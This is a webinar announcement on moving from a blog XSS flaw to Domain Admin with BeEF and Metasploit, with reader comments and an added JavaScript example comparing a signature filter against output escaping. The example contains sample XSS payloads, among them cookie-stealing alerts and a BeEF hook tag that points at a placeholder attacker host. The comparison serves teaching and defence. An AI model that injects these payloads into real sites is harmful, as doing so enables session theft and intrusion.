From XSS to Domain Admin

On August 26th, our Security Researcher Davide Girardi, a.k.a. GiRa, will present an exploitation scenario on a typical company network. The exploitation will start from a Cross-Site Scripting flaw in the company blog and will end with a full Active Directory Administrator account.

The network has up-to-date client and server operating systems, a DMZ between two firewalls and a company website.

Since an image is worth a thousand words, here is a network diagram of the scenario:

You will have the opportunity to see some groovy usage of BeEF-XSS (the Browser Exploitation Framework), Metasploit and some Active Directory knowledge.

I’m interested in heavy firewalls like the ZyXEL USG 2000, because that is tighter security.
What if you were in a company with such security? It also has IDP & IPS. Besides that, a spam filter (e.g. Barracuda), which sits at the NAT, controls which mails are allowed or disallowed, and has its own database of signatures for filtering out viruses, worms etc.

One of the important things about many IDS systems is that they are usually signature based, so they can only block what is known. So if there is a known XSS attack in WordPress and it has a signature, the IDS can block it. But if it is a custom web app, there will be no signature for it and the IDS most likely will not block it. (Again, this depends on the specific IDS.)

Some defenses against this are Web Application Firewalls, which can monitor for XSS and injection strings; IDS systems that do heuristics or allow you to create custom signatures; and, not to forget, secure coding practices!

I believe the most important and effective defense against this specific type of attack is input validation and output escaping. This alone can combat injection. Without it even the strongest IDS might be bypassed because, as you said, IDSs are rule based, and if no rule covers a custom injection pattern it will fall through as legitimate traffic.

It’s amazing how many websites are vulnerable to injection (XSS or SQL) especially taking into account how simple the solution is.

Off topic: congrats on the great webinar. I was able to watch most of it, after which the connection dropped (I was in a pub/restaurant). Can’t wait for the recording to watch it again properly.
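The point made in the two comments above (a signature-based IDS or WAF only blocks the patterns it has been taught, while escaping untrusted data on output neutralises the injection whatever its pattern) is illustrated below as an added example. It is not part of the original post or of the presenter's material, and the blog's real code is not shown on this page; the payloads are constructed samples and the `attacker.invalid` host is a placeholder standing in for a BeEF hook server.

```javascript
// Added example (not from the original post): a signature-style XSS filter
// versus output escaping, run over constructed sample payloads.
// The host attacker.invalid below is a placeholder, not a real BeEF server.

// A blocklist of the kind a simple signature-based IDS/WAF rule might use.
// It can only match the patterns it has been taught.
const SIGNATURES = [/<script\b/i, /javascript:/i];

function signatureFilterBlocks(input) {
  return SIGNATURES.some((re) => re.test(input));
}

// Escaping for the HTML text and double-quoted attribute contexts.
// Every character that can open a tag or attribute is replaced by an entity.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable rendering: untrusted comment text concatenated straight into markup,
// the kind of flaw a blog comment field can have.
function renderCommentVulnerable(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened rendering: the same template, with the value escaped on output.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Detects markup a browser would execute: a <script> tag, or any tag carrying
// an on* event-handler attribute. Entity-encoded text never matches because
// no '<' survives escaping.
function hasExecutableMarkup(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\bon\w+\s*=/i.test(html);
}

// Constructed payloads: the first two match the signatures, the last two do not.
const PAYLOADS = [
  '<script>alert(document.cookie)</script>',
  '<script src="http://attacker.invalid/hook.js"></script>', // BeEF-style hook, placeholder host
  '<img src=x onerror="alert(document.cookie)">',
  '<svg/onload=alert(1)>',
];

function evaluate(payload) {
  return {
    payload,
    blockedBySignature: signatureFilterBlocks(payload),
    vulnerableOutputExecutable: hasExecutableMarkup(renderCommentVulnerable(payload)),
    safeOutputExecutable: hasExecutableMarkup(renderCommentSafe(payload)),
  };
}

function summary() {
  return PAYLOADS.map(evaluate);
}

// Print the comparison as a table when run directly with Node.
if (typeof require !== 'undefined' && require.main === module) {
  console.table(summary());
}
```

Run with `node` to see the table: the signature filter catches only the two `<script` payloads, the vulnerable template emits executable markup for all four, and the escaped template emits none of it. Note that `escapeHtml` is only correct for the HTML text and quoted-attribute contexts; data placed inside a JavaScript string, a URL or a CSS value needs the encoder for that context.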

Hey, thank you for sharing this one with us.
The question that comes to my mind every time I see a pentesting demonstration like this is: has the pentester prepared for this? If yes, what would be different if he hadn’t? I’m a new pentester and I want to know how pentesters start their process.
thanks again.

As a pentester you have to write a full and comprehensive report of all the vulnerabilities in the scope of your engagement. To do so, you have to train yourself by studying and by practising in a lab.

Of course, from time to time you encounter new scenarios and new challenges. In those cases your knowledge, your method and your intelligence will help you reach your goal. This, of course, takes time 😉

But, what if you had to invest a lot of time on every vulnerability you discover in your engagement? What if you have two weeks for a pentest of a system with three vulnerabilities and you have to invest ten days to exploit each vulnerability?

Hi,
My name is Devi, it is nice to see this. I would like to learn about security testing; for this, what is the minimal subject I have to know first? I come from a computer background and I did a QA tester job; is that enough, or do I need a stronger skill set? Please let me know.
Thanks,
Devi.

Does the blog site support CORS?
I’m new to this, so would you use nmap to scan the target and use a traceroute to find out information about the multiple hosts on the network? Then the Metasploit Framework to execute a remote connection to the specific host to be compromised? Will you be explaining the steps to gaining administrator privileges? Thank you

Are you only going to be using a canned exploit package like Metasploit, or are you going to use modified scripts/exploits? If you are using Metasploit, I am assuming you will be using it along with proxychains to tunnel to other machines? And if we cannot make it to the live demo, will it be up for replay later?

Hi davide,
I’m amazed by the opportunity that you are offering, and I have been waiting for this webinar for a long time. I have just one problem: when I reserved a seat in the webinar I didn’t know where I would be at the time of it. Now I’m in the Balkans on holiday and tomorrow I won’t be able to follow the webinar live. Is there any chance you could record it so I can watch it once I’m back home?
Thank you so much anyway for the great opportunity you are giving us!

My question is: we will be using BeEF to exploit browser vulnerabilities in order to gain a root shell and then transfer our Meterpreter shell to another service, but what if I am doing a penetration test against an organization that doesn’t use any vulnerable browser?

Plus, we have to social engineer the victim into going to our BeEF server’s URL. How is that possible in a real-life penetration test?

Can you guide me on best practices for browser exploitation and XSS social engineering?